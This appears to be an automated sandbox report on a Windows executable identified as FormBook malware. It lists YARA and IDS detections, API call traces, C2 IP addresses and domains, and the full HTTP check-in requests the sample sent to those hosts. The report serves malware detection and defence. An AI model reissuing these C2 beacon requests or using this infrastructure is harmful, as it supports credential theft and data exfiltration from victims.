Source: N2Qncau2rN.exe | ReversingLabs: Detection: 71%
Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.4128778951.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4128752269.0000000004BC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1888404688.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1886252240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.4131107461.0000000004F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4122907990.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4126780482.0000000002730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1888965861.0000000006200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: N2Qncau2rN.exe | Joe Sandbox ML: detected
Source: N2Qncau2rN.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: auuGcaPMTDojV.exe, 00000003.00000000.1802625939.0000000000A0E000.00000002.00000001.01000000.00000004.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4125799190.0000000000A0E000.00000002.00000001.01000000.00000004.sdmp
(This PDB path sits in the image region of auuGcaPMTDojV.exe and identifies that binary as a build of Joe Sandbox's own FakeChrome decoy browser rather than code written by the sample's author. Its MD5 32B8AD6ECA9094891E792631BAEA9717 is therefore a sandbox-environment artifact, not a hash of attacker code, and should not be promoted to an indicator.)
Source: Binary string: wntdll.pdbUGP | source: N2Qncau2rN.exe, 00000000.00000003.1657483680.0000000004690000.00000004.00001000.00020000.00000000.sdmp, N2Qncau2rN.exe, 00000000.00000003.1659461075.00000000044F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1888606997.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1785147049.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1787099857.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1888606997.000000000359E000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4129055443.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000003.1889918613.0000000002A85000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000003.1885758983.00000000028BC000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4129055443.0000000002C30000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: RPCPing.pdbGCTL | source: svchost.exe, 00000002.00000003.1850301385.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1850352705.0000000002E2B000.00000004.00000020.00020000.00000000.sdmp, auuGcaPMTDojV.exe, 00000003.00000003.2198579685.00000000007DB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: N2Qncau2rN.exe, 00000000.00000003.1657483680.0000000004690000.00000004.00001000.00020000.00000000.sdmp, N2Qncau2rN.exe, 00000000.00000003.1659461075.00000000044F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1888606997.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1785147049.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1787099857.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1888606997.000000000359E000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, RpcPing.exe, 00000005.00000002.4129055443.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000003.1889918613.0000000002A85000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000003.1885758983.00000000028BC000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4129055443.0000000002C30000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: RPCPing.pdb | source: svchost.exe, 00000002.00000003.1850301385.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1850352705.0000000002E2B000.00000004.00000020.00020000.00000000.sdmp, auuGcaPMTDojV.exe, 00000003.00000003.2198579685.00000000007DB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb | source: RpcPing.exe, 00000005.00000002.4129603004.000000000325C000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4127083272.00000000027C2000.00000004.00000020.00020000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000002B5C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2185961069.000000000D58C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP | source: RpcPing.exe, 00000005.00000002.4129603004.000000000325C000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4127083272.00000000027C2000.00000004.00000020.00020000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000002B5C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2185961069.000000000D58C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\N2Qncau2rN.exe | Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose | 0_2_00452492
Source: C:\Users\user\Desktop\N2Qncau2rN.exe | Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_00442886
Source: C:\Users\user\Desktop\N2Qncau2rN.exe | Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf | 0_2_004788BD
Source: C:\Users\user\Desktop\N2Qncau2rN.exe | Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose | 0_2_004339B6
Source: C:\Users\user\Desktop\N2Qncau2rN.exe | Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose | 0_2_0045CAFA
Source: C:\Users\user\Desktop\N2Qncau2rN.exe | Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_00431A86
Source: C:\Users\user\Desktop\N2Qncau2rN.exe | Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose | 0_2_0044BD27
Source: C:\Users\user\Desktop\N2Qncau2rN.exe | Code function: 0_2_0045DE8F FindFirstFileW,FindClose | 0_2_0045DE8F
Source: C:\Users\user\Desktop\N2Qncau2rN.exe | Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose | 0_2_0044BF8B
Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_0048C4E0 FindFirstFileW,FindNextFileW,FindClose | 5_2_0048C4E0
Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 4x nop then xor eax, eax | 5_2_00479B20
Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 4x nop then mov ebx, 00000004h | 5_2_02B304E8

            Networking

Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60559 -> 74.208.236.25:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60552 -> 74.208.236.25:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60551 -> 74.208.236.25:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:60549 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:60549 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60627 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:60575 -> 74.208.236.25:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:60575 -> 74.208.236.25:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:60657 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:60657 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60611 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60715 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60698 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:60728 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:60728 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60641 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60679 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60775 -> 203.175.9.128:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60788 -> 203.175.9.128:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60807 -> 203.175.9.128:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:60821 -> 203.175.9.128:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:60821 -> 203.175.9.128:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60832 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60833 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:60835 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:60835 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60836 -> 199.192.19.19:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60837 -> 199.192.19.19:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60838 -> 199.192.19.19:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60842 -> 208.91.197.27:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:60843 -> 208.91.197.27:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60849 -> 84.32.84.32:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60848 -> 84.32.84.32:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:60843 -> 208.91.197.27:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60846 -> 156.242.132.82:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60840 -> 208.91.197.27:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60852 -> 3.91.127.116:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60850 -> 84.32.84.32:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60853 -> 3.91.127.116:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:60847 -> 156.242.132.82:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:60847 -> 156.242.132.82:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:60839 -> 199.192.19.19:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:60851 -> 84.32.84.32:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60844 -> 156.242.132.82:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60841 -> 208.91.197.27:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:60851 -> 84.32.84.32:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:60839 -> 199.192.19.19:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60854 -> 3.91.127.116:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60845 -> 156.242.132.82:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:60855 -> 3.91.127.116:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:60855 -> 3.91.127.116:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60857 -> 195.161.68.8:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60856 -> 195.161.68.8:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:60859 -> 195.161.68.8:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:60859 -> 195.161.68.8:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:60871 -> 154.23.184.240:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:60871 -> 154.23.184.240:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60862 -> 194.58.112.174:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60858 -> 195.161.68.8:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:60867 -> 15.197.204.56:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60866 -> 15.197.204.56:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:60867 -> 15.197.204.56:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60860 -> 194.58.112.174:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60865 -> 15.197.204.56:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:60863 -> 194.58.112.174:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:60863 -> 194.58.112.174:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60869 -> 154.23.184.240:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60870 -> 154.23.184.240:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60864 -> 15.197.204.56:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60868 -> 154.23.184.240:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60861 -> 194.58.112.174:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60834 -> 3.33.130.190:80
            Source: DNS query: www.animekuid.xyz
            Source: DNS query: www.demovix.xyz
            Source: DNS query: www.broomeorchard.xyz
            Source: Joe Sandbox View | IP Address: 208.91.197.27
            Source: Joe Sandbox View | IP Address: 84.32.84.32
            Source: Joe Sandbox View | ASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK
            Source: Joe Sandbox View | ASN Name: AMAZON-AESUS
            Source: Joe Sandbox View | ASN Name: CONFLUENCE-NETWORK-INCVG
            Source: Joe Sandbox View | ASN Name: NTT-LT-ASLT
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\N2Qncau2rN.exe | Code function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile, | 0_2_004422FE
            Source: global traffic | HTTP traffic detected: GET /hfue/?WX=rnWllP5PLlhLLtj&tpTd=GzF3o7eza1dU4F476cHHeral/cYJG+FCwgJMIz0HPlfrSCMBDVuQfjGNmxBd7moVrhCGY2hY7MCgK+MnekgstTp0z3ZjcP9rk68ek43BHqQDCfcAeg== HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Host: www.multileveltravel.world | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
            Source: global traffic | HTTP traffic detected: GET /sld7/?tpTd=/serfU6kaxhlkkJx8dOr0qlSRXA+6La0KEB68G6jbYfyT6z2zvVJBFhkOYA104kn6FRHm7lAc7gn2TRu9DlziYvx9tC/5P1WJl131MkdoxRdpo/lsw==&WX=rnWllP5PLlhLLtj HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Host: www.falconclub.online | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
            Source: global traffic | HTTP traffic detected: GET /abrg/?WX=rnWllP5PLlhLLtj&tpTd=GnAJmiRPPiyH2TmfuBVnsZoXdGf0FUPFySgQhtVOM4GwnDq9Dnvh9ePCWYtJxLLAU+yG0d2c2V85YMiF3u+CH4Whw+Z8K8Lme5ABmnpnJdsWz6g8ww== HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Host: www.promasterev.shop | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
            Source: global traffic | HTTP traffic detected: GET /itly/?tpTd=tsSBdLA6gv84Y8GcYug/jDCyCw8YLYxClZSiOA0GXKnW8CsuEbQ9YFwfaGPSJlWcPZlV2TdpOPQww8tdSTouVEB2Caqu0WVs/8KUUJONnONwfAEA0g==&WX=rnWllP5PLlhLLtj HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Host: www.childlesscatlady.today | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
            Source: global traffic | HTTP traffic detected: GET /7un9/?tpTd=4XOwgplivDvk/EZOubh+oM7E4qBWP2ACvZmroFPOKBmtqB+PCSuAHgoGD1T4VUWf5wIO7JPBcjeVh4zPUWd0ua1JHgAe3g4A1TGkBV6DNuNtOYfRKw==&WX=rnWllP5PLlhLLtj HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Host: www.animekuid.xyz | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
            Source: global traffic | HTTP traffic detected: GET /szy7/?tpTd=K8R7SnSfb7dli3eXRAD3SnntsVSSj1ZCjsRlCzIsDWJUxclcgzVYTq7f6N7/UKjTBpPX3WVoPH/v0tj5Dmk2jiKrkd/jwL9iqNrnd9yIGgMT9MzICA==&WX=rnWllP5PLlhLLtj HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Host: www.doggieradio.net | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
            Source: global traffic | HTTP traffic detected: GET /azuc/?WX=rnWllP5PLlhLLtj&tpTd=IEG0cbQocDdgsf0hXa+uAMZkMIV+L9dmDWmvXBjU8TDCB1WiaKjeRQjMK7ZBG/72TlyV3qB8EHQj0nSZZfMRzC5BhxJ3N2wZ76F+LQzPhJ8EwwRHzQ== HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Host: www.demovix.xyz | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
            Source: global traffic | HTTP traffic detected: GET /bnrz/?tpTd=OQxwzbuOtqgqEYELNcMucZtHnRjB34c8S/VejUlVZtuveUVj7y4E7KtMGd+fy1MLwhM03wpJ8ksC3Umpmq48p+wh68NaozaF8Wex7USlPt5ZhMWe3g==&WX=rnWllP5PLlhLLtj HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Host: www.palcoconnector.net | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
            Source: global traffic | HTTP traffic detected: GET /b6g5/?tpTd=a8QqMioE13Jt2iPiOClkfJLiI6soJM7xy7KAtya8ruOCNgqe2jC0xyltzPPw7ePD7gDMaG5P8Bx9i7otBFrSmSNv5WmdoflN7m2YOZj8dE3cyj5SIw==&WX=rnWllP5PLlhLLtj HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Host: www.shanhaiguan.net | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
            Source: global traffic | HTTP traffic detected: GET /n2dv/?tpTd=bOYvUT8qr4FCBQL4q+W2EOsk7MURICY42o+fYfsEfk4vvxNQfURJ5XqGAnjP2wivb2XfCAEuS6lNjanH3pgkh9rgu/pEJ/+PKIa4gq6/Dbg2n2byoA==&WX=rnWllP5PLlhLLtj HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Host: www.es-lidl.online | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
